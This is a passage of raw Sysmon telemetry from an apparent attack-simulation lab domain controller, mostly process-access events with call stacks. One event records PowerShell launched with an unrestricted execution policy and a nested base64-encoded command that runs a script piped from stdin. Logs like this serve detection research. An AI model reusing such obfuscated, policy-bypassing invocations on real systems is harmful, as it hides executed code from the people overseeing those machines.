08:40:24.868{5D479F2C-1678-5F84-FF02-000000007E01}47564000C:\Windows\system32\conhost.exe{5D479F2C-1678-5F84-0103-000000007E01}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000216Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000215Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000214Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000213Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000212Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000211Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000210Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000209Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000207Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000206Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000205Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-1678-5F84-0103-000000007E01}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000204Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1678-5F84-0003-000000007E01}47485080C:\Windows\system32\cmd.exe{5D479F2C-1678-5F84-0103-000000007E01}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000203Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.877{5D479F2C-1678-5F84-0103-000000007E01}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1678-5F84-7C8C-110000000000}0x118c7c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-1678-5F84-0003-000000007E01}4748C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000202Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000201Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1678-5F84-FF02-000000007E01}47564000C:\Windows\system32\conhost.exe{5D479F2C-1678-5F84-0003-000000007E01}4748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000200Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C: